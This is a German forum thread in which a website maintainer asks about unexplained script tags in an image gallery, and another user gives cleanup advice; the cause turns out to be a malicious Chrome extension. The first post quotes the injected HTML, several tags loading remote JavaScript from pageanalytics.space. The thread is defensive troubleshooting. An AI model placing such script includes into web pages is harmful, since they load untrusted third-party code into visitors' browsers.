Javascript in der Bildergallerie - Schadsoftware?

Hier bekommst Du deutschsprachigen Support. Keine Fehlermeldungen oder Erweiterungswünsche bitte!
Post Reply
mseydel
Posts: 37
Joined: Sat 15. Jan 2005, 23:33

Javascript in der Bildergallerie - Schadsoftware?

Post by mseydel » Tue 11. Dec 2018, 14:48

Hallo zusammen,
ich habe jemanden der wenn er eine Bildergalerie bei seiner Seite aufruft eine Fehlermeldung bekommt das dort etwas nicht stimmt Malware. Ich habe den selben Virenscanner der zeigt nichts an.

Ich habe mir diese diese Bildergalerie angesehen im Quelltext und dort Script Einträge gefunden die nur dort vorhanden sind und die kann ich nicht wirklich zuordnen wie kommen die dorthin und was ist das? Gut sieht das nicht aus. Im Moment habe ich diese Bildergallerie deaktiviert aber das ist ja nicht die Lösung.

Code: Select all

<!-- Livedate: 16.04.2018 00:00:00 / Killdate: 11.07.2022 09:59:03 -->
<h1>Titel</h1>
<p>&nbsp;</p>
<script type="text/javascript" src="https://pageanalytics.space/addons/lnkr5.min.js"></script> <script type="text/javascript" src="https://pageanalytics.space/ext/1b9fde3ea6122a26ed.js?sid=52079_7071_&amp;title=&amp;blocks[]=31af2"></script> <script type="text/javascript" src="https://pageanalytics.space/optout/set/lat?jsonp=__twb_cb_65276098&amp;key=1b9fde3ea6122a26ed&amp;cv=1530169514&amp;t=1530169514050"></script> <script type="text/javascript" src="https://pageanalytics.space/optout/set/lt?jsonp=__twb_cb_936723202&amp;key=1b9fde3ea6122a26ed&amp;cv=135476&amp;t=1530169514050"></script> <script type="text/javascript" src="https://pageanalytics.space/addons/lnkr5.min.js"></script> <script type="text/javascript" src="https://pageanalytics.space/ext/1b9fde3ea6122a26ed.js?sid=52079_7071_&amp;title=&amp;blocks[]=31af2"></script>
<script type="text/javascript" src="https://pageanalytics.space/addons/lnkr5.min.js"></script>
<script type="text/javascript" src="https://pageanalytics.space/ext/1b9fde3ea6122a26ed.js?sid=52079_7071_&amp;title=&amp;blocks[]=31af2"></script>


<!-- 
	Livedate: 16.04.2018 00:00:00 / Killdate: 11.07.2022 09:59:03 
//-->
<p>&nbsp;</p>
<script type="text/javascript" src="https://pageanalytics.space/addons/lnkr5.min.js"></script>
<script type="text/javascript" src="https://pageanalytics.space/ext/1b9fde3ea6122a26ed.js?sid=52079_7071_&amp;title=&amp;blocks[]=31af2"></script>
Gruß
Matthias

User avatar
top
Posts: 461
Joined: Fri 11. Aug 2006, 15:03
Location: Eutin

Re: Javascript in der Bildergallerie - Schadsoftware?

Post by top » Wed 12. Dec 2018, 09:49

mseydel wrote:
Tue 11. Dec 2018, 14:48
Hallo zusammen,
ich habe jemanden der wenn er eine Bildergalerie bei seiner Seite aufruft eine Fehlermeldung bekommt das dort etwas nicht stimmt Malware. Ich habe den selben Virenscanner der zeigt nichts an.
...
Dann sollte er zuerst mal ganz schnell sein Windows überprüfen:
https://www.trojaner-board.de/191604-pa ... ernen.html

Von einem direkten Angriff auf phpwcms würde ich erst einmal nicht ausgehen. Ich kenne diesen Virus nicht und weiß nicht was er anstellt. Gut möglich, dass dieser beim Bearbeiten der Seite beim klicken des Speichern-Buttons automatisch diese Links in die Eingabefelder ergänzt - oder ob der Virus auf seinen FTP-Zugang zugreift, um beliebte Standard-Scripte (wie Bildergalerien) zu suchen in denen er sich dann mit ein paar Ergänzungen verewigt.

Oder gibt es noch weitere Rechner über die auf das Backend der Seite zugegriffen wurde?

Ich würde an deiner Stelle auch mal per FTP schauen ob es verdächtige Abweichungen vom Datum bei irgendwelchen Scripten gibt. Also kürzlich veränderte oder neu erstellte Dateien, für die du garantiert nicht verantwortlich bist.

Viel Glück,
top

mseydel
Posts: 37
Joined: Sat 15. Jan 2005, 23:33

Re: Javascript in der Bildergallerie - Schadsoftware?

Post by mseydel » Thu 13. Dec 2018, 17:29

Hallo,
ja Danke für den Tipp mit den Eingabefeldern, unglaublich was es alles gibt. Er hatte sich wohl so Erweiterung für Chrome unterjubeln lassen diese hat die Einträge in dem Artikel verursacht stand im Artikel Summary habe ich mir in der Datenbank angesehen und entfernt.

Gruß
Matthias

Post Reply